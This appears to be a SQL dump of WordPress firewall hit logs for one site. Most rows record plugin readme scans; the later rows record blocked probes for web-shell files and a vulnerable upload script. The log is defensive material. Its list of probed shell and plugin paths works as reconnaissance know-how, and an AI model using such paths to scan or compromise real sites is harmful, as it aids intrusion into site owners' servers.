INSERT INTO `wp_wfhits` VALUES (12556,1674983147.817676,1674983147.694300,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://dailyjolly.co.uk/wp-content/plugins/yith-woocommerce-gift-cards-premium/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Macintosh; Intel Mac OS X 13_0_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy95aXRoLXdvb2NvbW1lcmNlLWdpZnQtY2FyZHMtcHJlbWl1bS9yZWFkbWUudHh0\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy95aXRoLXdvb2NvbW1lcmNlLWdpZnQtY2FyZHMtcHJlbWl1bS9yZWFkbWUudHh0\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12557,1674983147.817553,1674983147.694300,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://dailyjolly.co.uk/wp-content/plugins/yith-woocommerce-gift-cards-premium/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Macintosh; Intel Mac OS X 13_0_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy95aXRoLXdvb2NvbW1lcmNlLWdpZnQtY2FyZHMtcHJlbWl1bS9yZWFkbWUudHh0\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy95aXRoLXdvb2NvbW1lcmNlLWdpZnQtY2FyZHMtcHJlbWl1bS9yZWFkbWUudHh0\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12558,1674983160.015955,1674983159.895700,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://dailyjolly.co.uk/wp-content/plugins/image-hover-effects-ultimate/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Macintosh; Intel Mac OS X 13_0_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9pbWFnZS1ob3Zlci1lZmZlY3RzLXVsdGltYXRlL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9pbWFnZS1ob3Zlci1lZmZlY3RzLXVsdGltYXRlL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12559,1674983160.015841,1674983159.895700,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://dailyjolly.co.uk/wp-content/plugins/image-hover-effects-ultimate/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Macintosh; Intel Mac OS X 13_0_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9pbWFnZS1ob3Zlci1lZmZlY3RzLXVsdGltYXRlL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9pbWFnZS1ob3Zlci1lZmZlY3RzLXVsdGltYXRlL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12560,1674983148.695433,1674983148.581500,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/yith-woocommerce-gift-cards-premium/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Macintosh; Intel Mac OS X 13_0_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy95aXRoLXdvb2NvbW1lcmNlLWdpZnQtY2FyZHMtcHJlbWl1bS9yZWFkbWUudHh0\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy95aXRoLXdvb2NvbW1lcmNlLWdpZnQtY2FyZHMtcHJlbWl1bS9yZWFkbWUudHh0\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12561,1674983148.695317,1674983148.581500,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/yith-woocommerce-gift-cards-premium/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Macintosh; Intel Mac OS X 13_0_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy95aXRoLXdvb2NvbW1lcmNlLWdpZnQtY2FyZHMtcHJlbWl1bS9yZWFkbWUudHh0\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy95aXRoLXdvb2NvbW1lcmNlLWdpZnQtY2FyZHMtcHJlbWl1bS9yZWFkbWUudHh0\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12562,1674983171.348942,1674983171.208600,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://dailyjolly.co.uk/wp-content/plugins/shortcode-addons/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zaG9ydGNvZGUtYWRkb25zL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zaG9ydGNvZGUtYWRkb25zL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12563,1674983171.348823,1674983171.208600,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://dailyjolly.co.uk/wp-content/plugins/shortcode-addons/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zaG9ydGNvZGUtYWRkb25zL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zaG9ydGNvZGUtYWRkb25zL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12564,1674983166.005483,1674983165.880500,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/woo-product-table/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Macintosh; Intel Mac OS X 13_0_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93b28tcHJvZHVjdC10YWJsZS9yZWFkbWUudHh0\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93b28tcHJvZHVjdC10YWJsZS9yZWFkbWUudHh0\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12565,1674983166.005386,1674983165.880500,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/woo-product-table/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Macintosh; Intel Mac OS X 13_0_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93b28tcHJvZHVjdC10YWJsZS9yZWFkbWUudHh0\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93b28tcHJvZHVjdC10YWJsZS9yZWFkbWUudHh0\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12566,1674983165.707560,1674983165.602700,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://dailyjolly.co.uk/wp-content/plugins/woo-product-table/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Macintosh; Intel Mac OS X 13_0_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93b28tcHJvZHVjdC10YWJsZS9yZWFkbWUudHh0\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93b28tcHJvZHVjdC10YWJsZS9yZWFkbWUudHh0\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12567,1674983165.707463,1674983165.602700,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://dailyjolly.co.uk/wp-content/plugins/woo-product-table/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Macintosh; Intel Mac OS X 13_0_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93b28tcHJvZHVjdC10YWJsZS9yZWFkbWUudHh0\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93b28tcHJvZHVjdC10YWJsZS9yZWFkbWUudHh0\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12568,1674983160.704280,1674983160.591100,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/image-hover-effects-ultimate/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Macintosh; Intel Mac OS X 13_0_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9pbWFnZS1ob3Zlci1lZmZlY3RzLXVsdGltYXRlL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9pbWFnZS1ob3Zlci1lZmZlY3RzLXVsdGltYXRlL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12569,1674983160.704172,1674983160.591100,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/image-hover-effects-ultimate/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Macintosh; Intel Mac OS X 13_0_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9pbWFnZS1ob3Zlci1lZmZlY3RzLXVsdGltYXRlL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9pbWFnZS1ob3Zlci1lZmZlY3RzLXVsdGltYXRlL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12570,1674983177.562555,1674983177.453900,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/scripts-organizer/plugins/meta-box/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Linux; Android 12; SM-A205U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.141 Mobile Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zY3JpcHRzLW9yZ2FuaXplci9wbHVnaW5zL21ldGEtYm94L3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zY3JpcHRzLW9yZ2FuaXplci9wbHVnaW5zL21ldGEtYm94L3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12571,1674983177.562452,1674983177.453900,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/scripts-organizer/plugins/meta-box/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Linux; Android 12; SM-A205U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.141 Mobile Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zY3JpcHRzLW9yZ2FuaXplci9wbHVnaW5zL21ldGEtYm94L3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zY3JpcHRzLW9yZ2FuaXplci9wbHVnaW5zL21ldGEtYm94L3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12572,1674983177.251195,1674983177.124700,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://dailyjolly.co.uk/wp-content/plugins/scripts-organizer/plugins/meta-box/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Linux; Android 12; SM-A205U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.141 Mobile Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zY3JpcHRzLW9yZ2FuaXplci9wbHVnaW5zL21ldGEtYm94L3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zY3JpcHRzLW9yZ2FuaXplci9wbHVnaW5zL21ldGEtYm94L3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12573,1674983177.251076,1674983177.124700,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://dailyjolly.co.uk/wp-content/plugins/scripts-organizer/plugins/meta-box/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Linux; Android 12; SM-A205U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.141 Mobile Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zY3JpcHRzLW9yZ2FuaXplci9wbHVnaW5zL21ldGEtYm94L3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zY3JpcHRzLW9yZ2FuaXplci9wbHVnaW5zL21ldGEtYm94L3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12574,1674983172.038259,1674983171.909700,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/shortcode-addons/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zaG9ydGNvZGUtYWRkb25zL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zaG9ydGNvZGUtYWRkb25zL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12575,1674983172.038143,1674983171.909700,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/shortcode-addons/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zaG9ydGNvZGUtYWRkb25zL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zaG9ydGNvZGUtYWRkb25zL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12576,1674983216.158469,1674983216.039100,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://dailyjolly.co.uk/wp-content/plugins/capability-manager-enhanced/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Macintosh; Intel Mac OS X 13_0_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9jYXBhYmlsaXR5LW1hbmFnZXItZW5oYW5jZWQvcmVhZG1lLnR4dA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9jYXBhYmlsaXR5LW1hbmFnZXItZW5oYW5jZWQvcmVhZG1lLnR4dA==\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12577,1674983216.158351,1674983216.039100,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://dailyjolly.co.uk/wp-content/plugins/capability-manager-enhanced/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Macintosh; Intel Mac OS X 13_0_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9jYXBhYmlsaXR5LW1hbmFnZXItZW5oYW5jZWQvcmVhZG1lLnR4dA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9jYXBhYmlsaXR5LW1hbmFnZXItZW5oYW5jZWQvcmVhZG1lLnR4dA==\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12578,1674983216.801942,1674983216.689800,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/capability-manager-enhanced/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Macintosh; Intel Mac OS X 13_0_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9jYXBhYmlsaXR5LW1hbmFnZXItZW5oYW5jZWQvcmVhZG1lLnR4dA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9jYXBhYmlsaXR5LW1hbmFnZXItZW5oYW5jZWQvcmVhZG1lLnR4dA==\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12579,1674983216.801832,1674983216.689800,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/capability-manager-enhanced/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Macintosh; Intel Mac OS X 13_0_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9jYXBhYmlsaXR5LW1hbmFnZXItZW5oYW5jZWQvcmVhZG1lLnR4dA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9jYXBhYmlsaXR5LW1hbmFnZXItZW5oYW5jZWQvcmVhZG1lLnR4dA==\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12580,1674985626.940912,1674985626.809500,'\0\0\0\0\0\0\0\0\0\0���&�',0,403,0,0,0,'https://dailyjolly.co.uk/wp-content/plugins/seo-spy-google-wordpress-plugin/ofc/php-ofc-library/ofc_upload_image.php',NULL,'ALittle Client','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"QUxpdHRsZSBDbGllbnQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zZW8tc3B5LWdvb2dsZS13b3JkcHJlc3MtcGx1Z2luL29mYy9waHAtb2ZjLWxpYnJhcnkvb2ZjX3VwbG9hZF9pbWFnZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(12581,1674998365.768725,1674998365.637800,'\0\0\0\0\0\0\0\0\0\0��PL3',0,403,0,0,0,'https://dailyjolly.co.uk/wp-admin/wsoyanzorng.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCBpNjg2OyBydjoyOC4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzI4LjA=\",\"path\":\"L3dwLWFkbWluL3dzb3lhbnpvcm5nLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12582,1674998352.020115,1674998351.891900,'\0\0\0\0\0\0\0\0\0\0��PL3',0,403,0,0,0,'https://dailyjolly.co.uk/wp-admin/wsoyanzorng.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCBpNjg2OyBydjoyOC4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzI4LjA=\",\"path\":\"L3dwLWFkbWluL3dzb3lhbnpvcm5nLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12583,1674998085.952322,1674998085.820600,'\0\0\0\0\0\0\0\0\0\0��R��',0,403,0,0,0,'https://www.dailyjolly.co.uk/xleet-shell.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3hsZWV0LXNoZWxsLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12584,1674998056.011287,1674998055.882600,'\0\0\0\0\0\0\0\0\0\0��R��',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-class.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNsYXNzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12585,1674998045.948810,1674998045.815000,'\0\0\0\0\0\0\0\0\0\0��R��',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-includes/wp-class.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3dwLWNsYXNzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12586,1674998021.853420,1674998021.695700,'\0\0\0\0\0\0\0\0\0\0��R��',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/shell20211028.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvc2hlbGwyMDIxMTAyOC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(12587,1674998005.975700,1674998005.840800,'\0\0\0\0\0\0\0\0\0\0��R��',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/sid/sidwso.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious 